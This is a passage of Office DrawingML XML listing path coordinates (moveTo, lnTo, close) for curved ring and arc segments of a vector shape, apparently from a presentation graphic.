                <a:lnTo>
                  <a:pt x="893927" y="2355011"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="940193" y="2372068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="987412" y="2387193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1035532" y="2400338"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1084516" y="2411438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1084516" y="2372576"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2632710" h="2611754">
                <a:moveTo>
                  <a:pt x="1084516" y="200113"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1035532" y="211277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="987412" y="224459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="940193" y="239649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="893927" y="256781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="848664" y="275793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="804443" y="296672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="761314" y="319341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719328" y="343776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678535" y="369900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="638975" y="397700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="600710" y="427101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="563765" y="458063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="528205" y="490550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="494080" y="524510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="461429" y="559879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="430301" y="596633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400735" y="634707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="372808" y="674052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="346532" y="714641"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="321970" y="756412"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="299186" y="799312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278206" y="843305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="259080" y="888339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241858" y="934364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226593" y="981341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213334" y="1029220"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202120" y="1077937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241363" y="1077937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252958" y="1029970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="266623" y="982853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282321" y="936637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="299974" y="891387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="319544" y="847140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340982" y="803948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364236" y="761860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="389255" y="720940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="416001" y="681228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="444398" y="642759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="474421" y="605599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506006" y="569810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="539102" y="535419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573671" y="502488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="609663" y="471055"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="647001" y="441185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="685673" y="412915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="725589" y="386308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="766737" y="361416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="809040" y="338277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852462" y="316941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="896950" y="297459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="942441" y="279882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="988898" y="264274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1036269" y="250659"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1084516" y="239102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1084516" y="200113"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2632710" h="2611754">
                <a:moveTo>
                  <a:pt x="2038540" y="2398103"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2005901" y="2365718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1963648" y="2391359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1920659" y="2415222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1876971" y="2437320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1832622" y="2457653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1787702" y="2476208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1742224" y="2493010"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1696275" y="2508034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1649895" y="2521293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1603133" y="2532786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1556054" y="2542502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1508696" y="2550464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1461135" y="2556649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1413408" y="2561069"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1365567" y="2563723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1317675" y="2564612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1269796" y="2563723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1221955" y="2561069"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1174229" y="2556649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1126667" y="2550464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1079309" y="2542502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1032230" y="2532786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="985469" y="2521293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="939088" y="2508034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="893140" y="2493010"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="847661" y="2476208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="802741" y="2457653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="758393" y="2437320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="714705" y="2415222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="671715" y="2391359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="629475" y="2365718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="596836" y="2398103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="637984" y="2423960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="679907" y="2448141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="722515" y="2470645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="765797" y="2491498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="809663" y="2510675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="854087" y="2528189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="899020" y="2544026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="944397" y="2558199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="990180" y="2570708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1036307" y="2581541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1082751" y="2590723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1129436" y="2598229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1176324" y="2604058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1223352" y="2608224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1270495" y="2610726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1317688" y="2611564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1364869" y="2610726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1412011" y="2608224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1459039" y="2604058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1505927" y="2598229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1552613" y="2590723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1599057" y="2581541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1645183" y="2570708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1690966" y="2558199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1736344" y="2544026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1781276" y="2528189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1825701" y="2510675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1869567" y="2491498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1912848" y="2470645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955457" y="2448141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1997379" y="2423960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2038540" y="2398103"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2632710" h="2611754">
                <a:moveTo>
                  <a:pt x="2038540" y="213448"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1997379" y="187604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955457" y="163423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1912848" y="140919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1869567" y="120065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1825701" y="100888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1781276" y="83375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1736344" y="67538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1690966" y="53365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1645183" y="40855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1599057" y="30022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1552613" y="20840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1505927" y="13335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1459039" y="7505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1412011" y="3340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1364869" y="838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1317675" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1270495" y="838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1223352" y="3340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1176324" y="7505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1129436" y="13335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1082751" y="20840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1036307" y="30022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="990180" y="40855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="944397" y="53365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="899020" y="67538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="854087" y="83375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="809663" y="100888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="765797" y="120065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="722515" y="140919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="679907" y="163423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="637984" y="187604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="596836" y="213448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="629475" y="245833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="671715" y="220205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="714705" y="196342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="758393" y="174244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="802741" y="153911"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="847661" y="135343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="893140" y="118554"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="939088" y="103530"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="985469" y="90271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1032230" y="78778"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1079309" y="69049"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1126667" y="61099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1174229" y="54914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1221955" y="50495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1269796" y="47840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1317688" y="46964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1365567" y="47840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1413408" y="50495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1461135" y="54914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1508696" y="61099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1556054" y="69049"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1603133" y="78778"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1649895" y="90271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1696275" y="103530"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1742224" y="118554"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1787702" y="135343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1832622" y="153911"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1876971" y="174244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1920659" y="196342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1963648" y="220205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2005901" y="245833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2038540" y="213448"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2632710" h="2611754">
                <a:moveTo>
                  <a:pt x="2428684" y="1536661"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2389441" y="1536661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2377833" y="1584477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2364168" y="1631442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2348471" y="1677504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2330818" y="1722602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2311247" y="1766697"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2289810" y="1809737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2266556" y="1851685"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2241537" y="1892465"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2214791" y="1932051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2186394" y="1970379"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2156371" y="2007412"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2124786" y="2043087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2091690" y="2077351"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2057120" y="2110168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2021128" y="2141486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1983790" y="2171255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1945119" y="2199424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1905203" y="2225929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1864055" y="2250744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1821751" y="2273795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1778330" y="2295055"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1733842" y="2314460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1688350" y="2331974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1641894" y="2347518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1594523" y="2361082"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1546288" y="2372576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1546288" y="2411438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1595259" y="2400338"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1643380" y="2387193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1690598" y="2372068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1736864" y="2355011"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1782127" y="2336050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1826348" y="2315260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1869478" y="2292667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1911464" y="2268321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1952256" y="2242286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1991817" y="2214588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2030082" y="2185276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2067026" y="2154415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2102586" y="2122043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2136711" y="2088210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2169363" y="2052955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2200491" y="2016340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2230056" y="1978393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2257996" y="1939175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2284260" y="1898726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2308822" y="1857095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2331605" y="1814347"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2352586" y="1770494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2371712" y="1725625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2388933" y="1679752"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2404199" y="1632940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2417457" y="1585226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2428684" y="1536661"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2632710" h="2611754">
                <a:moveTo>
                  <a:pt x="2428684" y="1077937"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2417457" y="1029220"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2404199" y="981341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2388933" y="934364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2371712" y="888339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2352586" y="843305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2331605" y="799312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2308822" y="756412"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2284260" y="714641"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2257996" y="674052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2230056" y="634707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2200491" y="596633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2169363" y="559879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2136711" y="524510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2102586" y="490550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2067026" y="458063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2030082" y="427101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1991817" y="397700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1952256" y="369900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1911464" y="343776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1869478" y="319341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1826348" y="296672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1782127" y="275793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1736864" y="256781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1690598" y="239649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1643380" y="224459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1595259" y="211277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1546288" y="200113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1546288" y="239102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1594523" y="250659"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1641894" y="264274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1688350" y="279882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1733842" y="297459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1778330" y="316941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1821751" y="338277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1864055" y="361416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1905203" y="386308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1945119" y="412915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1983790" y="441185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2021128" y="471055"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2057120" y="502488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2091690" y="535419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2124786" y="569810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2156371" y="605599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2186394" y="642759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2214791" y="681228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2241537" y="720940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2266556" y="761860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2289810" y="803948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2311247" y="847140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2330818" y="891387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2348471" y="936637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2364168" y="982853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2377833" y="1029970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2389441" y="1077937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2428684" y="1077937"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2632710" h="2611754">
                <a:moveTo>
                  <a:pt x="2632316" y="1305775"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2631478" y="1259039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2628938" y="1212354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2624709" y="1165758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2618790" y="1119314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2611170" y="1073073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2601861" y="1027074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2590863" y="981379"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2578176" y="936028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2563787" y="891082"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2547709" y="846582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2529941" y="802589"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2510485" y="759129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2489339" y="716267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2466492" y="674065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2441956" y="632548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2415730" y="591781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2382964" y="624166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2408974" y="666013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2433193" y="708609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2455621" y="751878"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2476246" y="795794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2495092" y="840295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2512136" y="885329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2527376" y="930846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2540838" y="976782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2552496" y="1023086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2562364" y="1069721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2570442" y="1116609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2576715" y="1163713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2581198" y="1210983"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2583891" y="1258354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2584793" y="1305775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2583891" y="1353210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2581198" y="1400581"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2576715" y="1447850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2570442" y="1494955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2562364" y="1541843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2552496" y="1588477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2540838" y="1634782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2527376" y="1680718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2512136" y="1726234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2495092" y="1771269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2476246" y="1815769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2455621" y="1859686"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2433193" y="1902955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2408974" y="1945551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2382964" y="1987384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2415730" y="2019769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2441956" y="1979015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2466492" y="1937499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2489339" y="1895297"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2510485" y="1852434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2529941" y="1808975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2547709" y="1764982"/>
                </a:lnTo>
